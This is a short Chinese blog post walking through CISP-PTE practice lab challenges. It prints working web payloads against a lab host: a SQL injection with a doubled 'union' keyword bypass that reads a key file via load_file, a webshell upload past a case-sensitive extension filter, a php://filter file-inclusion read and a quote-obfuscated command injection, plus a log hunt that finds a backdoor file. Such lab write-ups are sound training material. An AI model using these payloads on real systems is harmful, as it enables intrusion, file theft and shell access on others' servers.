起因

最近小迷弟想考个证书，问我cisp-pte证书怎么样，题目难不难。
竟然问到了我都知识盲区......

恶补知识

在网上疯狂搜索题目,你别说还真找到了。
打开一看还特么要收费，气的直哆嗦。
拒绝一切不合理收费

另寻他法

没办法了只能掏出我的神器

目标

第一题 sql注入

通过题目可知，就是利用注入读取/tmp/360/key

经过测试过滤了union关键词(采用双写绕过)

最终得到key

payload

x.x.x.x:81/vulnerabilities/fu1.php?id=-1') uniounionn select 1,2,load_file('/tmp/360/key'),4,5,6,7 +--+

第二题文件上传

这个题挺简单

直接上传图片马,修改后缀为cmd.phP(过滤了php)即可得到shell

第三题文件包含

一开始以为解题的思路在view.html，经过一番测试无果，后来发现是php伪协进行文件包含.

payload

x.x.x.x:83/vulnerabilities/fu1.php?file=php://filter/read=convert.b ase64-encode/resource=/var/www/html/key.php

第四题命令执行

跟dvwa 那个靶机一样的

payload

127.0.0.1| c'a't ../key.php

第五题日志分析

有27M 这么大

用记事本打开直接崩溃了

通过状态码可以过滤一部分

继续搜索 admin

发现可疑文件

admin/backdoor.php

结束

经过这些，可以回答小迷弟的问题了